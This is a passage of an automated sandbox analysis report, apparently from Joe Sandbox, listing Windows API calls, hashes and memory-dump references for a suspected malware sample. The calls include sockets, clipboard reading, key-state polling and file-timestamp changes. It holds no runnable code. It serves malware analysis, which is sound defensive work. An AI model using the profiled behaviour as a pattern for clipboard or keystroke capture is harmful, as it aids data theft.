                                                                                                                                                                            • Instruction ID: 49a1caac5541b587bc648ef7caa6256b54369420b38b3993b587487a6931f65b
                                                                                                                                                                            • Opcode Fuzzy Hash: 49e0e17e9479d30b414134c7f78092e00673ae1a45d158f41d80208550ba4cb8
                                                                                                                                                                            • Instruction Fuzzy Hash: BA31AD75A083009FC310EF55D98090BB7E1AF89315F448D6FF94997362D778E9068B6A
                                                                                                                                                                            APIs
                                                                                                                                                                            • MkParseDisplayName.OLE32(?,00000000,?,?), ref: 0047AF0F
                                                                                                                                                                              • Part of subcall function 004781AE: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000001,00000000,NULL Pointer assignment,00000001), ref: 00478201
                                                                                                                                                                              • Part of subcall function 004781AE: VariantCopy.OLEAUT32(?,?), ref: 00478259
                                                                                                                                                                              • Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000058,?), ref: 00478270
                                                                                                                                                                              • Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000078,?), ref: 00478287
                                                                                                                                                                            • OleInitialize.OLE32(00000000), ref: 0047AE06
                                                                                                                                                                              • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
                                                                                                                                                                              • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
                                                                                                                                                                            • _wcslen.LIBCMT ref: 0047AE18
                                                                                                                                                                            • CreateBindCtx.OLE32(00000000,?), ref: 0047AEC2
                                                                                                                                                                            • CLSIDFromProgID.OLE32(00000000,?,?), ref: 0047AFCC
                                                                                                                                                                            • GetActiveObject.OLEAUT32(?,00000000,?), ref: 0047AFF9
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CopyVariant$_wcslen$ActiveBindCreateDisplayErrorFromInitializeLastNameObjectParseProg_wcscpy
                                                                                                                                                                            • String ID: HH
                                                                                                                                                                            • API String ID: 1915432386-2761332787
                                                                                                                                                                            • Opcode ID: e5cc958d5f324366fbee3d2ecbe33304f19c15b46d8e68c756c5eb73bbadfcb0
                                                                                                                                                                            • Instruction ID: 7e3b4e38c6064d991530b19baaff212313fd3e9d55f264e0ba959e8ba912c45c
                                                                                                                                                                            • Opcode Fuzzy Hash: e5cc958d5f324366fbee3d2ecbe33304f19c15b46d8e68c756c5eb73bbadfcb0
                                                                                                                                                                            • Instruction Fuzzy Hash: 6C915C71604301ABD710EB65CC85F9BB3E8AFC8714F10892EF64597291EB78E909CB5A
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: DEFINE$`$h$h
                                                                                                                                                                            • API String ID: 0-4194577831
                                                                                                                                                                            • Opcode ID: 924177e0c3576f85a96b78a37b3c3cedf46843da4e7c3acb3e3d7f55582469aa
                                                                                                                                                                            • Instruction ID: b1cbab3e2140d6a963e4b85c5b61650905c2e88cbb7a9c7ccaf19de07e543520
                                                                                                                                                                            • Opcode Fuzzy Hash: 924177e0c3576f85a96b78a37b3c3cedf46843da4e7c3acb3e3d7f55582469aa
                                                                                                                                                                            • Instruction Fuzzy Hash: 9802A1715083818FE725CF29C88076BBBE2BFD5304F28896EE89587342D779D849CB56
                                                                                                                                                                            APIs
                                                                                                                                                                            • socket.WSOCK32(00000002,00000001,00000006,?,00000000), ref: 004648B0
                                                                                                                                                                            • WSAGetLastError.WSOCK32(00000000,00000002,00000001,00000006,?,00000000), ref: 004648BE
                                                                                                                                                                            • bind.WSOCK32(00000000,?,00000010,00000002,00000001,00000006,?,00000000), ref: 004648DA
                                                                                                                                                                            • WSAGetLastError.WSOCK32(00000000,00000000,?,00000010,00000002,00000001,00000006,?,00000000), ref: 004648E6
                                                                                                                                                                            • closesocket.WSOCK32(00000000,00000000,00000000,00000000,00000005,00000000,?,00000010,00000002,00000001,00000006,?,00000000), ref: 0046492D
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ErrorLast$bindclosesocketsocket
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2609815416-0
                                                                                                                                                                            • Opcode ID: f055706b1daf61e2065e9fedb91be4565bf8eae27f8502184711caae908a2a6c
                                                                                                                                                                            • Instruction ID: d240999dee57073d64b91b26c15bb406cb7727aead8f71c00845428af50f987f
                                                                                                                                                                            • Opcode Fuzzy Hash: f055706b1daf61e2065e9fedb91be4565bf8eae27f8502184711caae908a2a6c
                                                                                                                                                                            • Instruction Fuzzy Hash: C731CB712002009BD710FF2ADC81B6BB3E8EF85724F144A5FF594A72D2D779AC85876A
                                                                                                                                                                            APIs
                                                                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32 ref: 00437043
                                                                                                                                                                            • Process32FirstW.KERNEL32(00000000,00000002), ref: 00437050
                                                                                                                                                                            • Process32NextW.KERNEL32(00000000,?), ref: 00437075
                                                                                                                                                                            • __wsplitpath.LIBCMT ref: 004370A5
                                                                                                                                                                              • Part of subcall function 00413DB0: __wsplitpath_helper.LIBCMT ref: 00413DF2
                                                                                                                                                                            • _wcscat.LIBCMT ref: 004370BA
                                                                                                                                                                            • __wcsicoll.LIBCMT ref: 004370C8
                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?), ref: 00437105
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wcsicoll__wsplitpath__wsplitpath_helper_wcscat
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2547909840-0
                                                                                                                                                                            • Opcode ID: fd838752e9d0606085fad0ec29118efadb7b5f17250a81beb0a2f2c9513d2e10
                                                                                                                                                                            • Instruction ID: d866d71778569fbbd99b025f777f77cc3db9ba9c83dfb601fa45888e96c7797d
                                                                                                                                                                            • Opcode Fuzzy Hash: fd838752e9d0606085fad0ec29118efadb7b5f17250a81beb0a2f2c9513d2e10
                                                                                                                                                                            • Instruction Fuzzy Hash: 9C21A7B20083819BD735DB55C881BEFB7E8BB99304F00491EF5C947241EB79A589CB6A
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                                                                                                                            • FindFirstFileW.KERNEL32(?,?,?,?,?,00000000), ref: 0045217E
                                                                                                                                                                            • Sleep.KERNEL32(0000000A,?,?,00000000), ref: 004521B2
                                                                                                                                                                            • FindNextFileW.KERNEL32(?,?,?,00000000), ref: 004522AC
                                                                                                                                                                            • FindClose.KERNEL32(?,?,00000000), ref: 004522C3
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Find$File$CloseFirstNextSleep_wcslen
                                                                                                                                                                            • String ID: *.*
                                                                                                                                                                            • API String ID: 2693929171-438819550
                                                                                                                                                                            • Opcode ID: 17936c38af85c1dbfc3d1ebbd0b26446ca2a596e07a4ad84d79ac0689e190811
                                                                                                                                                                            • Instruction ID: e6452ff64139cddd5fd774ab19bf2199aa97b2a19dc0f7115334900b47d689b2
                                                                                                                                                                            • Opcode Fuzzy Hash: 17936c38af85c1dbfc3d1ebbd0b26446ca2a596e07a4ad84d79ac0689e190811
                                                                                                                                                                            • Instruction Fuzzy Hash: BD419D756083409FC314DF25C984A9FB7E4BF86305F04491FF98993291DBB8E949CB5A
                                                                                                                                                                            APIs
                                                                                                                                                                            • OpenClipboard.USER32(?), ref: 0046C635
                                                                                                                                                                            • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046C643
                                                                                                                                                                            • GetClipboardData.USER32(0000000D), ref: 0046C64F
                                                                                                                                                                            • CloseClipboard.USER32 ref: 0046C65D
                                                                                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 0046C688
                                                                                                                                                                            • CloseClipboard.USER32 ref: 0046C692
                                                                                                                                                                            • IsClipboardFormatAvailable.USER32(00000001), ref: 0046C6D5
                                                                                                                                                                            • GetClipboardData.USER32(00000001), ref: 0046C6DD
                                                                                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 0046C6EE
                                                                                                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 0046C726
                                                                                                                                                                            • CloseClipboard.USER32 ref: 0046C866
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Clipboard$CloseGlobal$AvailableDataFormatLock$OpenUnlock
                                                                                                                                                                            • String ID: HH
                                                                                                                                                                            • API String ID: 589737431-2761332787
                                                                                                                                                                            • Opcode ID: 76419e0badb028214ed7bad9e924c36871e80023f9f647d131bfc03e45e064d3
                                                                                                                                                                            • Instruction ID: 5556deb4c8197336e1b92b5e2a85e957832ef7964462d916cb468ff193882e13
                                                                                                                                                                            • Opcode Fuzzy Hash: 76419e0badb028214ed7bad9e924c36871e80023f9f647d131bfc03e45e064d3
                                                                                                                                                                            • Instruction Fuzzy Hash: 7301F5762042005FC300AFB9ED45B6A7BA4EF59704F04097FF980A72C1EBB1E915C7AA
                                                                                                                                                                            APIs
                                                                                                                                                                            • __wcsicoll.LIBCMT ref: 0043643C
                                                                                                                                                                            • mouse_event.USER32(00000800,00000000,00000000,00000078,00000000), ref: 00436452
                                                                                                                                                                            • __wcsicoll.LIBCMT ref: 00436466
                                                                                                                                                                            • mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 0043647C
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: __wcsicollmouse_event
                                                                                                                                                                            • String ID: DOWN
                                                                                                                                                                            • API String ID: 1033544147-711622031
                                                                                                                                                                            • Opcode ID: 8e71a22f1bb6dc727f393f419cee3c46fab46d9365d91d475c80ba63e0095046
                                                                                                                                                                            • Instruction ID: 8a73d33e481528181e274ae5662561dddcd8f7088196b39fde8242b6fe69d79f
                                                                                                                                                                            • Opcode Fuzzy Hash: 8e71a22f1bb6dc727f393f419cee3c46fab46d9365d91d475c80ba63e0095046
                                                                                                                                                                            • Instruction Fuzzy Hash: 75E0927558872039FC4036253C02FFB174CAB66796F018116FE00D1291EA586D865BBD
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 004647A2: inet_addr.WSOCK32(?), ref: 004647C7
                                                                                                                                                                            • socket.WSOCK32(00000002,00000002,00000011,?,00000000), ref: 00474213
                                                                                                                                                                            • WSAGetLastError.WSOCK32(00000000), ref: 00474233
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ErrorLastinet_addrsocket
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 4170576061-0
                                                                                                                                                                            • Opcode ID: c11ce247c64ee683b380b6a697379cd3ea863651eb179087c325b129d43524e0
                                                                                                                                                                            • Instruction ID: 44a7e99483396e6262e636993c5e510db402c36a24f0b6146f21617b09e75fab
                                                                                                                                                                            • Opcode Fuzzy Hash: c11ce247c64ee683b380b6a697379cd3ea863651eb179087c325b129d43524e0
                                                                                                                                                                            • Instruction Fuzzy Hash: B6412C7164030067E720BB3A8C83F5A72D89F40728F144D5EF954BB2C3D6BAAD45475D
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetCursorPos.USER32(004A83D8), ref: 0045636A
                                                                                                                                                                            • ScreenToClient.USER32(004A83D8,?), ref: 0045638A
                                                                                                                                                                            • GetAsyncKeyState.USER32(?), ref: 004563D0
                                                                                                                                                                            • GetAsyncKeyState.USER32(?), ref: 004563DC
                                                                                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00456430
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AsyncState$ClientCursorLongScreenWindow
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3539004672-0
                                                                                                                                                                            • Opcode ID: 8b6f1a7d11e91e3692d621cb91ecba55955a7a9a0de246f0cd2a62484a80ce0b
                                                                                                                                                                            • Instruction ID: 0eacbf52c9ff4b21db6d2500407d28a57be55752a0539e191fb639d8ee6a043b
                                                                                                                                                                            • Opcode Fuzzy Hash: 8b6f1a7d11e91e3692d621cb91ecba55955a7a9a0de246f0cd2a62484a80ce0b
                                                                                                                                                                            • Instruction Fuzzy Hash: 8E416071108341ABD724DF55CD84EBBB7E9EF86725F540B0EB8A543281C734A848CB6A
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 0046DD22: IsWindow.USER32(00000000), ref: 0046DD51
                                                                                                                                                                            • IsWindowVisible.USER32 ref: 00477314
                                                                                                                                                                            • IsWindowEnabled.USER32 ref: 00477324
                                                                                                                                                                            • GetForegroundWindow.USER32(?,?,?,00000001,?,?), ref: 00477331
                                                                                                                                                                            • IsIconic.USER32 ref: 0047733F
                                                                                                                                                                            • IsZoomed.USER32 ref: 0047734D
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 292994002-0
                                                                                                                                                                            • Opcode ID: 1c24098bd8cb9da3f496229370c910df04dc27541171caa4f2956f9c30b83eee
                                                                                                                                                                            • Instruction ID: c753cb395bd8887e5e04db90522a3107d7308fd2cfa588f53a4db7a4177bc043
                                                                                                                                                                            • Opcode Fuzzy Hash: 1c24098bd8cb9da3f496229370c910df04dc27541171caa4f2956f9c30b83eee
                                                                                                                                                                            • Instruction Fuzzy Hash: 351172327041119BE3209B26DD05B9FB7A8AF91310F05882EFC49E7250D7B8EC42D7A9
                                                                                                                                                                            APIs
                                                                                                                                                                            • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000,75923220,00000000,00000000,00442E95,?,?,?), ref: 00436D4F
                                                                                                                                                                            • SetFileTime.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00000000), ref: 00436D8C
                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,00000000), ref: 00436D93
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: File$CloseCreateHandleTime
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3397143404-0
                                                                                                                                                                            • Opcode ID: 17e11168520f802dddbe8c477e19047108492bf153e6cd976562f268bfda3e60
                                                                                                                                                                            • Instruction ID: bce1a9391340f9688fe0750810cd2cb1b104417d8b3c1e96578cdf6de8724fbd
                                                                                                                                                                            • Opcode Fuzzy Hash: 17e11168520f802dddbe8c477e19047108492bf153e6cd976562f268bfda3e60
                                                                                                                                                                            • Instruction Fuzzy Hash: A4F0C83634132077E5301A69AC8DFCF276CABDAB32F20452EF741A61C083D51445977D
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _strncmp
                                                                                                                                                                            • String ID: ACCEPT$^$h
                                                                                                                                                                            • API String ID: 909875538-4263704089
                                                                                                                                                                            • Opcode ID: adbbb77bd847cefbadd23aa8e42bde8f813033e7c46a43322acc698efb747d92
                                                                                                                                                                            • Instruction ID: 72a2cba82410d8b1d90f72ff5cad5771b474d57714a55a9933f2c727144888ce
                                                                                                                                                                            • Opcode Fuzzy Hash: adbbb77bd847cefbadd23aa8e42bde8f813033e7c46a43322acc698efb747d92
                                                                                                                                                                            • Instruction Fuzzy Hash: AE22A0746083818FE725CF29C48076BBBE2BFC9304F24896EE8D587351D779984ACB56
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: ERCP$VUUU$VUUU$VUUU
                                                                                                                                                                            • API String ID: 0-2165971703
                                                                                                                                                                            • Opcode ID: fe5f619ecbbb89e409f3ebcf557090f4afc22d0cdf4dbad8df8e547bb5c0b5b7
                                                                                                                                                                            • Instruction ID: 514654dd073cfe12bfc68f6c44a091d7a3824994b709b832431b3f3de6bbd106
                                                                                                                                                                            • Opcode Fuzzy Hash: fe5f619ecbbb89e409f3ebcf557090f4afc22d0cdf4dbad8df8e547bb5c0b5b7
                                                                                                                                                                            • Instruction Fuzzy Hash: 5562D3716087818BE734CF18C8807ABB7E1EBC6314F154A2FE49986390E779D949CB5B
                                                                                                                                                                            APIs
                                                                                                                                                                            • FindFirstFileW.KERNEL32(00000000,?,?), ref: 0045C9BE
                                                                                                                                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 0045CA1B
                                                                                                                                                                            • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0045CA4A
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Find$File$CloseFirstNext
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3541575487-0
